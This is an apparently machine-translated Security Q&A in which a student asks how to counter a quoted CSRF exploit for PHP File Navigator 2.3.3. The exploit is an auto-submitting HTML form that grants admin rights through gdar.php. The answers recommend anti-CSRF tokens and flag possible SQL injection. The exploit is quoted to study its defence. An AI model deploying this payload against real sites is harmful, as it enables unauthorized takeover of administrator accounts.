首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >此php攻击代码的可能对策/修复?

此php攻击代码的可能对策/修复?
EN

Security用户
提问于 2016-10-09 18:01:06
回答 2查看 262关注 0票数 2

我在漏洞网站上发现了这个权限提升的漏洞代码,作为一项任务,我需要确定我将使用什么对策来纠正这个漏洞。作为分配标准的一部分,必须对更正进行编码。

我对利用漏洞和php仍然很陌生,所以我很难理解如何纠正这些漏洞和php。我已经考虑过实现最少的特权或特权分离,但我不知道这些将如何实现。对此漏洞应采取什么适当的对策或纠正措施?

系统: PHP文件导航器2.3.3

利用代码:

代码语言:javascript
复制
<!DOCTYPE>
<html>
<script>
function pwn(){
var e=document.getElementById('ELEVATO_DE_PRIVLOS')
e.submit()

}
</script>
<body onLoad="pwn()">


<!-- Escalate privs to that of Admin -->

<form id="ELEVATO_DE_PRIVLOS" action="
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/gdar.php"
method="post">
<input type="hidden" name="id_usuario" value="5" />
<input type="text" id="nome" name="nome" value="b2" class="text"
tabindex="10" />
<input type="text" id="usuario" name="usuario" value="b2" class="text"
tabindex="20" />
<input type="password" id="contrasinal" name="contrasinal"
value="abc123" class="text" tabindex="30" />
<input type="password" id="rep_contrasinal" name="rep_contrasinal"
value="abc123" class="text" tabindex="40" />
<input type="text" id="email" name="email" value="b@b.com" class="text"
tabindex="50" />
<input type="text" id="max_descargas" name="max_descargas" value="0"
class="text" tabindex="60" />
<input type="text" id="actual_descargas" name="actual_descargas"
value="0" class="text" tabindex="70" />
<select id="cambiar_datos" name="cambiar_datos" tabindex="75">
<option value="1" >ON</option>
<option value="0" selected="selected">OFF</option>
</select>
<select id="id_grupo" name="id_grupo" tabindex="80">
<option value="1" selected="selected">Administrators</option>
</select>
<select id="admin" name="admin" tabindex="90">
<option value="1" selected="selected">ON</option>
<option value="0">OFF</option>
</select>
<select id="estado" name="estado" tabindex="100">
<option value="1" selected="selected">ON</option>
<option value="0" >OFF</option>
</select>
<input type="checkbox" id="Fraices_1" name="Fraices[]" value="1"
class="checkbox" />
</form>

</body>
</html>
EN

回答 2

Security用户

发布于 2016-10-09 18:28:27

这绝对不是针对CVE-2011-3775的攻击,这是一个相当低严重程度的信息泄漏漏洞。

这是对CSRF漏洞的利用,因此您应该防范这种漏洞。参见例如对CSRF的防御

票数 1
EN

Security用户

发布于 2017-02-06 20:51:44

因此,整个问题是,您可以任意地将该表单提交给您的gdar.php。gdar.php应该只允许从特定页面向它发布信息,这可以通过cookie/会话令牌来完成,以验证它们在某个页面上,并且它们是具有特定权限的特定用户。有关预防CSRF的更多信息,请访问OWASP安全备忘单

查看代码gdar.php,它看起来也容易受到since的影响,因为它直接将提交的文本从post字段提取到查询中。查看资源,以便在PHP中停止SQLi。

票数 0
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/139245

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档